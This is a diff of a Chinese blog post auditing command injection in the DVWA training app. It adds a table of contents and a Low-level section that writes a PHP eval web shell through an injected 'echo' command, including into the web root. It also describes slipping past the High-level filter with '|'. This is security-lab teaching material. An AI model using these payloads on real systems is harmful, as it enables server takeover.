--- a/_posts/2019-03-15-DVWA代码审计--命令执行.md
+++ b/_posts/2019-03-15-DVWA代码审计--命令执行.md
@@ -23,8 +23,24 @@ tag: 代码审计
 
 ------
 
+### 目录：
 
-### NO.1 低级篇
+* <a href="#low" target="_self">Low</a>
+    * <a href="#a1" target="_self">isset()函数</a>
+    * <a href="#a2" target="_self">empty()函数</a>
+    * <a href="#a3" target="_self">explode()函数</a>
+    * <a href="#a4" target="_self">is_numeric()函数</a>
+    * <a href="#a5" target="_self">strist()r函数</a>
+    * <a href="#a6" target="_self">php_uname()函数</a>
+* <a href="#medium" target="_self">Medium</a>
+    * <a href="#a7" target="_self">array_keys()函数</a>
+    * <a href="#a8" target="_self">str_replace()函数</a>
+* <a href="#high" target="_self">High</a>
+
+------
+
+
+### <span id = "low">NO.1 Low
 
 首先来看下代码
 
@@ -56,31 +72,31 @@ if( isset( $_POST[ 'Submit' ]  ) ) {
 
 ----
 
-**`isset()`**函数检测变量是否设置，是返回true，否则返回false<br>
+<span id = "a1">**`isset()`**</span>函数检测变量是否设置，是返回true，否则返回false<br>
 
 语法：bool isset( mixed var [, mixed var [, ...]] )<br>
 
 ----
 
-**`empty()`**函数检查一个变量是否为空，是返回true，否则返回false<br>
+<span id = "a2">**`empty()`**</span>函数检查一个变量是否为空，是返回true，否则返回false<br>
 
 语法：bool empty(mixed var)<br>
 
 ---
 
-**`explode()`**函数使用一个字符串分割另一个字符串，并返回由字符串组成的数组。<br>
+<span id = "a3">**`explode()`**</span>函数使用一个字符串分割另一个字符串，并返回由字符串组成的数组。<br>
 
 语法：explode(separator,string,limit)<br>
 
 ----
 
-**`is_numeric()`**函数用于检测变量是否为数字或数字字符串。<br>
+<span id = "a4">**`is_numeric()`**</span>函数用于检测变量是否为数字或数字字符串。<br>
 
 语法：bool is_numeric ( mixed $var )<br>
 
 ----
 
-**`stristr()`**函数搜索字符串在另一字符串中的第一次出现，并返回字符串的剩余部分。<br>
+<span id = "a5">**`stristr()`**</span>函数搜索字符串在另一字符串中的第一次出现，并返回字符串的剩余部分。<br>
 
 **例：**<br>
 ```php
@@ -95,7 +111,7 @@ echo stristr("Hello world!","WORLD");
 
 ----
 
-**`php_uname()`**返回运行 PHP 的系统的有关信息。<br>
+<span id = "a6">**`php_uname()`**</span>返回运行 PHP 的系统的有关信息。<br>
 
 语法：php_uname ([ string $mode = "a" ] ) : string<br>
 
@@ -122,7 +138,7 @@ mode 是单个字符，用于定义要返回什么信息：
 
 这里直接输入123都是可以的<br>
 
-![images](/images/2019-3-15/exec01.png)
+![images](/images/2019-03-15/exec01.png)
 
 ---
 
@@ -151,13 +167,40 @@ mode 是单个字符，用于定义要返回什么信息：
 
 然后就可以直接操作了，<br>
 
-![images](/images/2019-3-15/exec02.png)
+![images](/images/2019-03-15/exec02.png)
+
+----
+
+除了这些操作之外，还可以写shell ，<br>
+
+首先使用 **dir** 命令 查看路径，<br>
+
+![images](/images/2019-03-15/exec04.png)
+
+----
+
+然后使用命令写入文件：<br>
+```php
+127.0.0.1 && echo ^<?php eval($_POST[cmd]);?^> > shell.php
+```
+
+如果不写路径的的话，默认写入在**dir** 命令查看到的路径下，<br>
+
+当然也可以直接写入到网站根目录下，<br>
+
+命令：<br>
+```php
+127.0.0.1 && echo ^<?php eval($_POST[cmd]);?^> > D:\phpStudy\PHPTutorial\WWW\dvwa\shell.php
+```
+
+然后就可以直接上菜刀了，<br>
+
+**注意：** **`<`**(左尖括号) 要使用 **`^`** 号来转义
 
 ----
 
 
-
-### NO.2 Medium
+### <span id = "medium">NO.2 Medium</span>
 
 一样，还是先看看代码，<br/>
 
@@ -196,7 +239,7 @@ if( isset( $_POST[ 'Submit' ]  ) ) {
 
 ----
 
-**`array_keys()`**函数返回包含数组中所有键名的一个新数组。<br>
+<span id = "a7">**`array_keys()`**</span>函数返回包含数组中所有键名的一个新数组。<br>
 
 **例：**<br>
 ```php
@@ -223,7 +266,7 @@ Array ( [0] => Volvo [1] => BMW [2] => Toyota )
 
 ----
 
-**`str_replace()`**函数替换字符串中的一些字符（区分大小写）。<br>
+<span id = "a8">**`str_replace()`**</span>函数替换字符串中的一些字符（区分大小写）。<br>
 
 语法：str_replace(find,replace,string,count)<br>
 
@@ -251,8 +294,7 @@ $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
 -------
 
 
-
-### NO.3 High
+### <span id = "high">NO.3 High</span>
 
 
 ```php
@@ -301,7 +343,7 @@ if( isset( $_POST[ 'Submit' ]  ) ) {
 
 我们看到第三个字符，过滤的是`|`+空格，并没有直接过滤`|`，然后我们依旧可以使用`|`进行绕过，<br>
 
-![images](/images/2019-3-15/exec03.png)
+![images](/images/2019-03-15/exec03.png) <br>
 
 到这来依旧没有结束，发现好像还有其他绕过方法，，如果可行的话还将继续更新。。 <br>
 
